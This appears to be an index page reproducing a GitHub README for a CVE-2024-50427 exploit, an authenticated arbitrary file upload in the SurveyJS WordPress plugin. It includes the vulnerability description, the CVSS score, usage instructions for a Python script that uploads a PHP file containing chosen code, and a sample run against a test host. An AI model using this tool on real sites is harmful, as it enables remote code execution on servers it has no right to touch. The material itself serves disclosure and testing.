Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-50427
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-50427
- Owner: RandomRobbieBF
- Created: 2024-11-08T12:24:06.000Z (about 2 months ago)
- Default Branch: main
- Last Pushed: 2024-11-08T12:26:12.000Z (about 2 months ago)
- Last Synced: 2024-11-08T13:30:35.337Z (about 2 months ago)
- Language: Python
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# CVE-2024-50427
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload

# Description:

The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.9.136. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs
```

How to use
---

```
usage: CVE-2024-50427.py [-h] [--code CODE] url username password

Upload a PHP file to a WordPress site.

positional arguments:
  url          The URL of the WordPress site (e.g., http://example.com)
  username     Your WordPress username
  password     Your WordPress password

options:
  -h, --help   show this help message and exit
  --code CODE  PHP code to execute
```

POC
---

```
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php
```